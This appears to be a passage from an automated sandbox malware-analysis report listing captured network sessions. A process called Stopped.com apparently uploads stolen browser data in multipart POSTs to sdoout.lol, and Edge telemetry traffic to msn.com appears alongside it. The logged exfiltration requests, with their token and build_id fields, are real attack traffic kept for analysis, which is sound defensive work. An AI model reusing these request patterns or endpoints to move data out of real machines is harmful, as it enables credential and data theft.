                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                            Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:31 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            33192.168.2.550106116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----nyc2ngv37ycbim7y5xbi
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 393697
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6e 79 63 32 6e 67 76 33 37 79 63 62 69 6d 37 79 35 78 62 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 6e 79 63 32 6e 67 76 33 37 79 63 62 69 6d 37 79 35 78 62 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6e 79 63 32 6e 67 76 33 37 79 63 62 69 6d 37 79 35 78 62 69 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------nyc2ngv37ycbim7y5xbiContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------nyc2ngv37ycbim7y5xbiContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------nyc2ngv37ycbim7y5xbiCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:31 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            34192.168.2.550104104.46.162.2254435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC1026OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735660768164&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            Content-Length: 10946
                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                            Cookie: USRLOC=; MUID=2A5E9301422D68911D9D866743856932; _EDGE_S=F=1&SID=12141DD01C6B6C930BE408B61D416DDA; _EDGE_V=1
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC10946OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 31 54 31 35 3a 35 39 3a 32 38 2e 31 36 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 64 36 64 35 38 64 61 34 2d 62 39 34 30 2d 34 30 32 63 2d 61 33 38 34 2d 65 66 31 39 63 61 63 38 35 33 39 39 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 30 36 37 38 39 39 36 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                            Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-31T15:59:28.162Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"d6d58da4-b940-402c-a384-ef19cac85399","epoch":"2006789965"},"app":{"locale
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:31 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                            P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                            Set-Cookie: MC1=GUID=d2c6ef90ee1e41cb872207ca0fb1b613&HASH=d2c6&LV=202412&V=4&LU=1735660770619; Domain=.microsoft.com; Expires=Wed, 31 Dec 2025 15:59:30 GMT; Path=/;Secure; SameSite=None
